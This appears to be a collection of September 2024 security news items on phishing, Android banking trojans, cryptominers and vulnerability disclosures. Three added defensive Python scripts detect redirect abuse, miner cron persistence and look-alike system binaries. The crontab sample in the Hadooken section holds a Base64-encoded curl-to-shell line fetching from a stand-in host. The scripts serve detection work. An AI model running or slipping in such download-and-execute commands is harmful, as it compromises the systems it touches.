"By carefully mimicking legitimate domains and redirecting victims to official sites, attackers can effectively mask their true objectives and increase the likelihood of successful credential theft," the researchers said.
"These tactics highlight the sophisticated strategies attackers use to avoid detection and exploit unsuspecting targets."
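Because the hop lives in the response header rather than in the HTML, a proxy or sandbox that only inspects page content never sees it. The following is an added example written for this page, not Unit 42 code: it parses a raw HTTP response, pulls the refresh target out of the Refresh header (and, to cover the HTML equivalent as well, out of a meta refresh tag), and flags the traits the researchers describe: an immediate redirect, a cross-domain hop, and a recipient e-mail address carried in the URL. The sample responses and hostnames are constructed.

```python
"""Detect Refresh-header redirects in HTTP responses (added example, not Unit 42 code).

A server can answer 'Refresh: 0; url=https://...' and the browser navigates
before any HTML is parsed, so HTML-only inspection misses the hop. This
parser extracts the refresh target from the header first, then from the
equivalent <meta http-equiv="refresh"> tag, and scores the traits described
in the report. All sample responses below are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urljoin, urlsplit

REFRESH_VALUE_RE = re.compile(
    r"^\s*(?P<delay>\d+)\s*(?:[;,]\s*url\s*=\s*['\"]?(?P<url>[^'\"\s>]+)['\"]?)?\s*$", re.I)
META_REFRESH_RE = re.compile(
    r"<meta[^>]+http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*content\s*=\s*['\"]([^'\"]+)['\"]", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def split_response(raw: bytes) -> Tuple[Dict[str, List[str]], str]:
    """Return (headers keyed by lower-case name, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, List[str]] = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:   # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body.decode("utf-8", errors="replace")


def extract_refresh(raw: bytes) -> Optional[Tuple[str, int, Optional[str]]]:
    """Find a refresh directive: (source, delay seconds, target url or None)."""
    headers, body = split_response(raw)
    for value in headers.get("refresh", []):
        m = REFRESH_VALUE_RE.match(value)
        if m:
            return "header", int(m.group("delay")), m.group("url")
    m = META_REFRESH_RE.search(body)
    if m:
        inner = REFRESH_VALUE_RE.match(m.group(1))
        if inner:
            return "meta", int(inner.group("delay")), inner.group("url")
    return None


def analyze_response(raw: bytes, requested_url: str) -> Dict[str, object]:
    """Score a response for the redirect traits described in the report."""
    found = extract_refresh(raw)
    if found is None:
        return {"redirect": False, "indicators": []}
    source, delay, target = found
    indicators = [f"refresh_{source}"]
    if target:
        target = urljoin(requested_url, target)   # resolve relative targets
        if urlsplit(target).hostname != urlsplit(requested_url).hostname:
            indicators.append("cross_domain")
        if EMAIL_RE.search(unquote(target)):
            indicators.append("email_in_url")     # used to pre-fill the fake login page
    if delay == 0:
        indicators.append("immediate")
    return {"redirect": True, "source": source, "delay": delay,
            "target": target, "indicators": indicators}


# Constructed samples. The first mimics the campaign: a tracking-style domain
# answers with an immediate header refresh to a look-alike webmail login that
# carries the recipient's address in the query string.
PHISH_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Refresh: 0; url=https://mail-login.example.net/owa/?login=alice%40victim.example\r\n"
    b"\r\n"
    b"<html><body>Redirecting...</body></html>"
)
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Refresh: 30\r\n"                         # periodic reload of the same page
    b"\r\n"
    b"<html><body>Dashboard</body></html>"
)
META_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b'<html><head><meta http-equiv="refresh" content="0; url=/next"></head></html>'
)


if __name__ == "__main__":
    print(analyze_response(PHISH_RESPONSE, "https://track.example.com/c/abc"))
    print(analyze_response(BENIGN_RESPONSE, "https://app.example.com/"))
    print(analyze_response(META_RESPONSE, "https://a.example/x"))
```

A benign periodic reload carries only the refresh indicator; the constructed phishing response trips all four, and the combination of an immediate cross-domain hop with an e-mail address in the target is what distinguishes the campaign from ordinary use of the header. The practical lesson for inspection tooling is to read headers on the response path, not just the rendered body.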
Phishing and business email compromise (BEC) continue to be prominent pathways for adversaries looking to siphon information and perform financially motivated attacks.
BEC attacks have cost U.S. and international organizations an estimated $55.49 billion between October 2013 and December 2023, with over 305,000 scam incidents reported during the same time period, according to the U.S. Federal Bureau of Investigation (FBI).
The development comes amid "dozens of scam campaigns" that have leveraged deepfake videos featuring public figures, CEOs, news anchors, and top government officials to promote bogus investment schemes such as Quantum AI since at least July 2023.
These campaigns are propagated via posts and ads on various social media platforms, directing users to phony web pages that prompt them to fill out a form in order to sign up, after which a scammer contacts them via a phone call and asks them to pay an initial fee of $250 in order to access the service.
"The scammer instructs the victim to download a special app so that they can 'invest' more of their funds," Unit 42 researchers said. "Within the app, a dashboard appears to show small profits."
"Finally, when the victim tries to withdraw their funds, the scammers either demand withdrawal fees or cite some other reason (e.g., tax issues) for not being able to get their funds back.
"The scammers may then lock the victim out of their account and pocket the remaining funds, causing the victim to have lost the majority of the money that they put into the 'platform.'"
It also follows the discovery of a stealthy threat actor that presents itself as a legitimate enterprise and has been advertising automated CAPTCHA-solving services at scale to other cybercriminals and helping them infiltrate IT networks.
Dubbed Greasy Opal by Arkose Labs, the Czech Republic-based "cyber attack enablement business" is believed to have been operational since 2009, offering to customers a toolkit of sorts for credential stuffing, mass fake account creation, browser automation, and social media spam at a price point of $190 and an additional $10 for a monthly subscription.
The product portfolio runs the cybercrime gamut, allowing them to develop a sophisticated business model by packaging several services together. The entity's revenues for 2023 alone are said to be no less than $1.7 million.
"Greasy Opal employs cutting-edge OCR technology to effectively analyze and interpret text-based CAPTCHAs, even those distorted or obscured by noise, rotation, or occlusion," the fraud prevention company noted in a recent analysis. "The service develops machine-learning algorithms trained on extensive datasets of images."
One of its users is Storm-1152, a Vietnamese cybercrime group that was previously identified by Microsoft as selling 750 million fraudulent Microsoft accounts and tools through a network of bogus websites and social media pages to other criminal actors.
"Greasy Opal has built a thriving conglomerate of multi-faceted businesses, offering not only CAPTCHA-solving services but also SEO-boosting software and social media automation services that are often used for spam, which could be a precursor for malware delivery," Arkose Labs said.
"This threat actor group reflects a growing trend of businesses operating in a gray zone, while its products and services have been used for illegal activities downstream."
Ivanti Warns of Active Exploitation of Newly Patched Cloud Appliance Vulnerability
14.9.24 Exploit The Hacker News
Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild.
The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances.
"An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution," Ivanti noted in an advisory released earlier this week. "The attacker must have admin level privileges to exploit this vulnerability."
The flaw impacts Ivanti CSA 4.6, which has currently reached end-of-life status, requiring that customers upgrade to a supported version going forward. That said, it has been addressed in CSA 4.6 Patch 519.
"With the end-of-life status this is the last fix that Ivanti will backport for this version," the Utah-based IT software company added. "Customers must upgrade to Ivanti CSA 5.0 for continued support."
"CSA 5.0 is the only supported version and does not contain this vulnerability. Customers already running Ivanti CSA 5.0 do not need to take any additional action."
On Friday, Ivanti updated its advisory to note that it observed confirmed exploitation of the flaw in the wild targeting a "limited number of customers."
It did not reveal additional specifics related to the attacks or the identity of the threat actors weaponizing it. However, a number of other vulnerabilities in Ivanti products have been exploited as zero-days by China-nexus cyberespionage groups.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 4, 2024.
The disclosure also comes as cybersecurity company Horizon3.ai posted a detailed technical analysis of a critical deserialization vulnerability (CVE-2024-29847, CVSS score: 10.0) impacting Endpoint Manager (EPM) that results in remote code execution.
Apple Vision Pro Vulnerability Exposed Virtual Keyboard Inputs to Attackers
14.9.24 Exploit The Hacker News
Details have emerged about a now-patched security flaw impacting Apple's Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device's virtual keyboard.
The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865.
"A novel attack that can infer eye-related biometrics from the avatar image to reconstruct text entered via gaze-controlled typing," a group of academics from the University of Florida, CertiK Skyfall Team, and Texas Tech University said.
"The GAZEploit attack leverages the vulnerability inherent in gaze-controlled text entry when users share a virtual avatar."
Following responsible disclosure, Apple addressed the issue in visionOS 1.3 released on July 29, 2024. It described the vulnerability as impacting a component called Presence.
"Inputs to the virtual keyboard may be inferred from Persona," it said in a security advisory, adding it resolved the problem by "suspending Persona when the virtual keyboard is active."
In a nutshell, the researchers found that it was possible to analyze a virtual avatar's eye movements (or "gaze") to determine what the user wearing the headset was typing on the virtual keyboard, effectively compromising their privacy.
As a result, a threat actor could, hypothetically, analyze virtual avatars shared via video calls, online meeting apps, or live streaming platforms and remotely perform keystroke inference. This could then be exploited to extract sensitive information such as passwords.
The attack, in turn, is accomplished by means of a supervised learning model trained on Persona recordings, eye aspect ratio (EAR), and eye gaze estimation to differentiate between typing sessions and other VR-related activities (e.g., watching movies or playing games).
In the subsequent step, the gaze estimation directions on the virtual keyboard are mapped to specific keys in order to determine the potential keystrokes in a manner such that it also takes into account the keyboard's location in the virtual space.
"By remotely capturing and analyzing the virtual avatar video, an attacker can reconstruct the typed keys," the researchers said. "Notably, the GAZEploit attack is the first known attack in this domain that exploits leaked gaze information to remotely perform keystroke inference."
17-Year-Old Arrested in Connection with Cyber Attack Affecting Transport for London
14.9.24 Crime The Hacker News
British authorities on Thursday announced the arrest of a 17-year-old male in connection with a cyber attack affecting Transport for London (TfL).
"The 17-year-old male was detained on suspicion of Computer Misuse Act offenses in relation to the attack, which was launched on TfL on 1 September," the U.K. National Crime Agency (NCA) said.
The teenager, who's from Walsall, is said to have been arrested on September 5, 2024, following an investigation that was launched in the incident's aftermath.
The law enforcement agency said the unnamed individual was questioned and subsequently let go on bail.
"Attacks on public infrastructure such as this can be hugely disruptive and lead to severe consequences for local communities and national systems," Deputy Director Paul Foster, head of the NCA's National Cyber Crime Unit, said.
"The swift response by TfL following the incident has enabled us to act quickly, and we are grateful for their continued cooperation with our investigation, which remains ongoing."
TfL has since confirmed that the security breach has led to the unauthorized access of bank account numbers and sort codes for around 5,000 customers and that it will be directly contacting those impacted.
"Although there has been very little impact on our customers so far, the situation is evolving and our investigations have identified that certain customer data has been accessed," TfL said.
"This includes some customer names and contact details, including email addresses and home addresses where provided."
The London public transportation agency is also requiring around 30,000 members of its staff to complete an IT identity check by attending an appointment at a specified TfL location to reset their password and be verified in-person for access to TfL applications and data.
It's worth noting that West Midlands police previously arrested a 17-year-old boy, also from Walsall, in July 2024 in connection with a ransomware attack on MGM Resorts. The incident was attributed to the infamous Scattered Spider group.
It's currently not clear if these two events refer to the same individual. Back in June, another 22-year-old U.K. national was arrested in Spain for his alleged involvement in several ransomware attacks carried out by Scattered Spider.
The dangerous e-crime group is part of a larger collective called The Com, a loose-knit ecosystem of various groups that have engaged in cybercrime, squatting, and physical violence. It's also tracked as 0ktapus, Octo Tempest, and UNC3944.
According to a new report from EclecticIQ, Scattered Spider's ransomware operations have increasingly honed in on cloud infrastructures within the insurance and financial sectors, echoing a similar analysis from Resilience Threat Intelligence in May 2024.
The group has a well-documented history of gaining persistent access to cloud environments via sophisticated social engineering tactics, as well as purchasing stolen credentials, executing SIM swaps, and utilizing cloud-native tools.
"Scattered Spider frequently uses phone-based social engineering techniques like voice phishing (vishing) and text message phishing (smishing) to deceive and manipulate targets, mainly targeting IT service desks and identity administrators," security researcher Arda Büyükkaya said.
"The cybercriminal group abuses legitimate cloud tools such as Azure's Special Administration Console and Data Factory to remotely execute commands, transfer data, and maintain persistence while avoiding detection."
TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud
14.9.24 Virus The Hacker News
Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.
"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition, the application is installed through a dropper app that shares the same anti-analysis mechanisms."
"These features are designed to evade detection and hinder cybersecurity professionals' efforts to analyze and mitigate the malware."
TrickMo, first caught in the wild by CERT-Bund in September 2019, has a history of targeting Android devices, particularly those of users in Germany, to siphon one-time passwords (OTPs) and other two-factor authentication (2FA) codes to facilitate financial fraud.
The mobile-focused malware is assessed to be the work of the now-defunct TrickBot e-crime gang, over time continually improving its obfuscation and anti-analysis features to fly under the radar.
Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android's accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device.
The malicious dropper app discovered by the Italian cybersecurity company masquerades as the Google Chrome web browser that, when launched after installation, urges the victim to update Google Play Services by clicking the Confirm button.
Should the user proceed with the update, an APK file containing the TrickMo payload is downloaded to the device under the guise of "Google Services," following which the user is asked to enable accessibility services for the new app.
"Accessibility services are designed to assist users with disabilities by providing alternative ways to interact with their devices," the researchers said. "However, when exploited by malicious apps like TrickMo, these services can grant extensive control over the device."
"This elevated permission allows TrickMo to perform various malicious actions, such as intercepting SMS messages, handling notifications to intercept or hide authentication codes, and executing HTML overlay attacks to steal user credentials. Additionally, the malware can dismiss keyguards and auto-accept permissions, enabling it to integrate seamlessly into the device's operations."
Furthermore, the abuse of the accessibility services allows the malware to disable crucial security features and system updates, auto-grant permissions at will, and prevent the uninstallation of certain apps.
Cleafy's analysis also uncovered misconfigurations in the command-and-control (C2) server that made it possible to access 12 GB worth of sensitive data exfiltrated from the devices, including credentials and pictures, without requiring any authentication.
The C2 server also hosts the HTML files used in the overlay attacks. These files encompass fake login pages for various services, including banks such as ATB Mobile and Alpha Bank and cryptocurrency platforms like Binance.
The security lapse not only highlights the operational security (OPSEC) blunder on the part of the threat actors, but also puts the victims' data at risk of exploitation by other threat actors.
The wealth of information exposed from TrickMo's C2 infrastructure could be leveraged to commit identity theft, infiltrate various online accounts, conduct unauthorized fund transfers, and even make fraudulent purchases. Even worse, attackers could hijack the accounts and lock the victims out by resetting their passwords.
"Using personal information and images, the attacker can craft convincing messages that trick victims into divulging even more information or executing malicious actions," the researchers noted.
"Exploiting such comprehensive personal data results in immediate financial and reputational damage and long-term consequences for the victims, making recovery a complex and prolonged process."
The disclosure comes as Google has been plugging the security holes around sideloading to let third-party developers determine if their apps are sideloaded using the Play Integrity API and, if so, require users to download the apps from Google Play in order to continue using them.
Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw
14.9.24 Exploit The Hacker News
Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks.
The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with discovering and reporting CVE-2024-6671 (CVSS score: 9.8).
Both the critical vulnerabilities, which allow an unauthenticated attacker to retrieve a user's encrypted password, were patched by Progress in mid-August 2024.
"The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC's publication," Trend Micro researchers Hitomi Kimura and Maria Emreen Viray said in a Thursday analysis.
The attacks observed by the cybersecurity company involve bypassing WhatsUp Gold authentication to exploit the Active Monitor PowerShell Script and ultimately download various remote access tools for gaining persistence on the Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed by means of a single MSI installer file retrieved from a remote server.
"The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function," the researchers explained. "The threat actors in this case chose it to perform for remote arbitrary code execution."
While no follow-on exploitation actions have been detected, the use of several remote access tools points to the involvement of a ransomware actor.
This is the second time security vulnerabilities in WhatsUp Gold have been actively weaponized in the wild. Early last month, the Shadowserver Foundation said it had observed exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.
The disclosure comes weeks after Trend Micro also revealed that threat actors are exploiting a now-patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell.
"The CVE-2023-22527 vulnerability continues to be widely exploited by a wide range of threat actors who abuse this vulnerability to perform malicious activities, making it a significant security risk to organizations worldwide," the company said.
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency
14.9.24 Cryptocurrency The Hacker News
Cybersecurity researchers have uncovered a new malware campaign targeting Linux environments to conduct illicit cryptocurrency mining and deliver botnet malware.
The activity, which specifically singles out the Oracle Weblogic server, is designed to deliver a malware strain dubbed Hadooken, according to cloud security firm Aqua.
"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," security researcher Assaf Morag said.
The attack chains exploit known security vulnerabilities and misconfigurations, such as weak credentials, to obtain an initial foothold and execute arbitrary code on susceptible instances.
This is accomplished by launching two nearly-identical payloads, one written in Python and the other, a shell script, both of which are responsible for retrieving the Hadooken malware from a remote server ("89.185.85[.]102" or "185.174.136[.]204").
"In addition, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers," Morag said.
"It then moves laterally across the organization or connected environments to further spread the Hadooken malware."
Hadooken comes embedded with two components, a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet called Tsunami (aka Kaiten), which has a history of targeting Jenkins and Weblogic services deployed in Kubernetes clusters.
Furthermore, the malware is responsible for establishing persistence on the host by creating cron jobs to run the crypto miner periodically at varying frequencies.
Hadooken's defense evasion capabilities are realized through a combination of tactics that involve the use of Base64-encoded payloads, dropping the miner payloads under innocuous names like "bash" and "java" to blend in with legitimate processes, and artifact deletion after execution to hide any signs of malicious activity.
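The persistence and blending-in tactics described above leave traces a defender can check for: a scheduled job whose binary is called "bash" or "java" but lives outside the usual system directories, and inline Base64 that decodes to a downloader command. The following is an added example written for this page, not code from Aqua or from the malware; the crontab it scans is constructed, and the trusted-directory list and name heuristics are assumptions a real deployment would tune to its own baseline.

```python
"""Flag crontab entries that look like cryptominer persistence.

Added example; the crontab below is constructed, not from the Aqua report.
Heuristics: a binary named like a trusted tool ("bash", "java") running from
an unexpected directory, and inline Base64 that decodes to shell commands.
"""
import base64
import re
import shlex
from typing import Dict, List

# Where a binary really called "bash" or "java" is expected to live (assumed baseline).
TRUSTED_DIRS = {"/bin", "/usr/bin", "/usr/local/bin", "/sbin", "/usr/sbin"}
# Names the report says the miner was dropped under.
LOOKALIKE_NAMES = {"bash", "java"}

# Five schedule fields or an @keyword, followed by the command.
CRON_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){5})(.*)$")

# Constructed sample crontab; the Base64 blob is built here so it is
# guaranteed to decode to the constructed command shown.
_B64_CMD = base64.b64encode(b"curl http://example.invalid/p | sh").decode()
SAMPLE_CRONTAB = f"""
# constructed sample crontab
PATH=/usr/bin:/bin
*/5 * * * * /usr/bin/java -jar /opt/app/app.jar
0 2 * * * /bin/bash /home/admin/backup.sh
*/10 * * * * /tmp/.x/java -c /tmp/.x/config.json
@reboot echo {_B64_CMD} | base64 -d | sh
"""


def cron_command(line: str):
    """Return the command part of a crontab line, or None for blanks, comments and VAR= lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    m = CRON_RE.match(line)
    return m.group(1).strip() if m else None


def findings_for_command(cmd: str) -> List[str]:
    """Return human-readable reasons a cron command looks suspicious (empty if none)."""
    reasons: List[str] = []
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return ["unparseable command"]
    for tok in tokens:
        directory, _, name = tok.rpartition("/")
        if "/" in tok and name in LOOKALIKE_NAMES and directory not in TRUSTED_DIRS:
            reasons.append(f"'{name}' executed from untrusted path {tok}")
    if re.search(r"\bbase64\s+(-d|--decode)\b", cmd):
        reasons.append("inline base64 decode")
    for tok in tokens:
        # Decode any long Base64 literal and look for downloader/shell keywords.
        if len(tok) < 16 or tok.startswith("/") or not re.fullmatch(r"[A-Za-z0-9+/=]+", tok):
            continue
        try:
            decoded = base64.b64decode(tok, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if re.search(r"\b(curl|wget|chmod|sh)\b", decoded):
            reasons.append(f"base64 literal decodes to shell: {decoded!r}")
    return reasons


def scan_crontab(text: str) -> Dict[str, List[str]]:
    """Map each suspicious crontab line to its list of reasons."""
    hits: Dict[str, List[str]] = {}
    for line in text.splitlines():
        cmd = cron_command(line)
        if cmd is None:
            continue
        reasons = findings_for_command(cmd)
        if reasons:
            hits[line.strip()] = reasons
    return hits


if __name__ == "__main__":
    for entry, why in scan_crontab(SAMPLE_CRONTAB).items():
        print(entry, "->", "; ".join(why))
```

Run against the constructed crontab, the two legitimate entries pass and the two planted ones are reported: the "java" binary under /tmp for its path, and the @reboot line both for the inline `base64 -d` and because its literal decodes to a curl-to-shell pipeline. Extending the scan to systemd timers and the per-user crontabs under /var/spool/cron is a matter of feeding those files to the same function.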
Aqua noted that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644), with a previous report from Uptycs in February 2024 linking it to an 8220 Gang cryptocurrency campaign that abused flaws in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address 185.174.136[.]204, while currently inactive, is also linked to Aeza Group Ltd. (AS216246). As highlighted by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider with a presence in Moscow M9 and in two data centers in Frankfurt.
"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," the researchers said in the report.
New Android Malware 'Ajina.Banker' Steals Financial Data and Bypasses 2FA via Telegram
13.9.24 Virus The Hacker News
Bank customers in the Central Asia region have been targeted by a new strain of Android malware codenamed Ajina.Banker since at least November 2023 with the goal of harvesting financial information and intercepting two-factor authentication (2FA) messages.
Singapore-headquartered Group-IB, which discovered the threat in May 2024, said the malware is propagated via a network of Telegram channels set up by the threat actors under the guise of legitimate applications related to banking, payment systems, and government services, or everyday utilities.
"The attacker has a network of affiliates motivated by financial gain, spreading Android banker malware that targets ordinary users," security researchers Boris Martynyuk, Pavel Naumov, and Anvar Anarkulov said.
Targets of the ongoing campaign include countries such as Armenia, Azerbaijan, Iceland, Kazakhstan, Kyrgyzstan, Pakistan, Russia, Tajikistan, Ukraine, and Uzbekistan.
There is evidence to suggest that some aspects of the Telegram-based malware distribution process may have been automated for improved efficiency. The numerous Telegram accounts are designed to serve crafted messages containing links -- either to other Telegram channels or external sources -- and APK files to unwitting targets.
The use of links pointing to Telegram channels that host the malicious files has an added benefit in that it bypasses security measures and restrictions imposed by many community chats, thereby allowing the accounts to evade bans when automatic moderation is triggered.
Besides abusing the trust users place in legitimate services to maximize infection rates, the modus operandi also involves sharing the malicious files in local Telegram chats by passing them off as giveaways and promotions that claim to offer lucrative rewards and exclusive access to services.
"The use of themed messages and localized promotion strategies proved to be particularly effective in regional community chats," the researchers said. "By tailoring their approach to the interests and needs of the local population, Ajina was able to significantly increase the likelihood of successful infections."
The threat actors have also been observed bombarding Telegram channels with several messages using multiple accounts, at times simultaneously, indicating a coordinated effort that likely employs some sort of an automated distribution tool.
The malware in itself is fairly straightforward in that, once installed, it establishes contact with a remote server and requests the victim to grant it permission to access SMS messages, phone number APIs, and current cellular network information, among others.
Ajina.Banker is capable of gathering SIM card information, a list of installed financial apps, and SMS messages, which are then exfiltrated to the server.
New versions of the malware are also engineered to serve phishing pages in an attempt to collect banking information. Furthermore, they can access call logs and contacts, as well as abuse Android's accessibility services API to prevent uninstallation and grant themselves additional permissions.
Google told The Hacker News that it did not find any evidence of the malware being propagated via the Google Play Store and that Android users are protected against the threat by Google Play Protect, which is on by default on Android devices with Google Play Services.
"The hiring of Java coders, created Telegram bot with the proposal of earning some money, also indicates that the tool is in the process of active development and has support of a network of affiliated employees," the researchers said.
"Analysis of the file names, sample distribution methods, and other activities of the attackers suggests a cultural familiarity with the region in which they operate."
The disclosure comes as Zimperium uncovered links between two Android malware families tracked as SpyNote and Gigabud (which is part of the GoldFactory family that also includes GoldDigger).
"Domains with really similar structure (using the same unusual keywords as subdomains) and targets used to spread Gigabud samples and were also used to distribute SpyNote samples," the company said. "This overlap in distribution shows that the same threat actor is likely behind both malware families, pointing to a well-coordinated and broad campaign."
Urgent: GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Job Execution
13.9.24 Vulnerability The Hacker News
GitLab on Wednesday released security updates to address 17 security vulnerabilities, including a critical flaw that allows an attacker to run pipeline jobs as an arbitrary user.
The issue, tracked as CVE-2024-6678, carries a CVSS score of 9.9 out of a maximum of 10.0.
"An issue was discovered in GitLab CE/EE affecting all versions starting from 8.14 prior to 17.1.7, starting from 17.2 prior to 17.2.5, and starting from 17.3 prior to 17.3.2, which allows an attacker to trigger a pipeline as an arbitrary user under certain circumstances," the company said in an alert.
The vulnerability, along with three high-severity, 11 medium-severity, and two low-severity bugs, has been addressed in versions 17.3.2, 17.2.5, and 17.1.7 of GitLab Community Edition (CE) and Enterprise Edition (EE).
It's worth noting that CVE-2024-6678 is the fourth such flaw that GitLab has patched over the past year after CVE-2023-5009 (CVSS score: 9.6), CVE-2024-5655 (CVSS score: 9.6), and CVE-2024-6385 (CVSS score: 9.6).
While there is no evidence of active exploitation of the flaws, users are recommended to apply the patches as soon as possible to mitigate against potential threats.
Earlier this May, U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a critical GitLab vulnerability (CVE-2023-7028, CVSS score: 10.0) had come under active exploitation in the wild.
Beware: New Vo1d Malware Infects 1.3 Million Android-based TV Boxes Worldwide
13.9.24 Virus The Hacker News
Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).
"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus vendor Doctor Web said in a report published today.
A majority of the infections have been detected in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.
It's currently not known what the source of the infection is, although it's suspected that it may have either involved an instance of prior compromise that allows for gaining root privileges or the use of unofficial firmware versions with built-in root access.
The following TV models have been targeted as part of the campaign -
KJ-SMART4KVIP (Android 10.1; KJ-SMART4KVIP Build/NHG47K)
R4 (Android 7.1.2; R4 Build/NHG47K)
TV BOX (Android 12.1; TV BOX Build/NHG47K)
The attack entails the substitution of the "/system/bin/debuggerd" daemon file (with the original file moved to a backup file named "debuggerd_real"), as well as the introduction of two new files – "/system/xbin/vo1d" and "/system/xbin/wd" – which contain the malicious code and operate concurrently.
"Before Android 8.0, crashes were handled by the debuggerd and debuggerd64 daemons," Google notes in its Android documentation. "In Android 8.0 and higher, crash_dump32 and crash_dump64 are spawned as needed."
Two different files shipped as part of the Android operating system – install-recovery.sh and daemonsu – have been modified as part of the campaign to trigger the execution of the malware by starting the "wd" module.
"The trojan's authors probably tried to disguise one of its components as the system program '/system/bin/vold,' having called it by the similar-looking name 'vo1d' (substituting the lowercase letter 'l' with the number '1')," Doctor Web said.
The "vo1d" payload, in turn, starts "wd" and ensures it's persistently running, while also downloading and running executables when instructed by a command-and-control (C2) server. Furthermore, it keeps tabs on specified directories and installs the APK files that it finds in them.
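Two of the artifacts described above are easy to check for on a device image: a binary whose name differs from a real system program only by a look-alike character (vo1d for vold), and an original daemon that has been moved aside under a backup-style name (debuggerd_real). The script below is an added example for this page, not code from Doctor Web; the directory listing it audits is constructed, and the allowlist of expected binaries is a hypothetical stand-in for the manifest of the specific firmware build being checked.

```python
"""Audit an Android system binary listing for look-alike and displaced binaries.

Added example; the listing and allowlist below are constructed and are not
data from the Doctor Web report. A real deployment would use the allowlist
of binaries shipped with the specific firmware build.
"""
from typing import Dict, List

# Digits an attacker swaps for visually similar letters ("vo1d" vs "vold").
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "5": "s"})

# Hypothetical allowlist: binaries expected on the build (basename only).
EXPECTED_BINARIES = {"vold", "debuggerd", "debuggerd64", "sh", "toybox", "logd", "installd", "netd"}
# Suffixes commonly used when an original is moved aside ("debuggerd_real").
BACKUP_SUFFIXES = ("_real", "_orig", ".bak", ".old")

SAMPLE_LISTING = [  # constructed listing of /system/bin and /system/xbin
    "/system/bin/vold",
    "/system/bin/debuggerd",
    "/system/bin/debuggerd_real",
    "/system/bin/sh",
    "/system/xbin/vo1d",
    "/system/xbin/wd",
    "/system/xbin/su",
]


def normalize(name: str) -> str:
    """Collapse confusable characters so 'vo1d' and 'vold' compare equal."""
    return name.translate(CONFUSABLES).lower()


def audit(listing: List[str], expected=EXPECTED_BINARIES) -> Dict[str, object]:
    """Classify every binary not on the allowlist as look-alike, displaced original, or unknown."""
    norm_expected = {normalize(n): n for n in expected}
    lookalikes: Dict[str, str] = {}
    displaced: List[str] = []
    unknown: List[str] = []
    for path in listing:
        name = path.rsplit("/", 1)[-1]
        if name in expected:
            continue
        if normalize(name) in norm_expected:
            # Same name after confusable folding, but not the real binary.
            lookalikes[path] = norm_expected[normalize(name)]
            continue
        stem = next((name[: -len(s)] for s in BACKUP_SUFFIXES if name.endswith(s)), None)
        if stem in expected:
            # An expected daemon renamed with a backup suffix: something replaced it.
            displaced.append(path)
            continue
        unknown.append(path)
    return {"lookalikes": lookalikes, "displaced_originals": displaced, "unknown": unknown}


if __name__ == "__main__":
    for category, items in audit(SAMPLE_LISTING).items():
        print(f"{category}: {items}")
```

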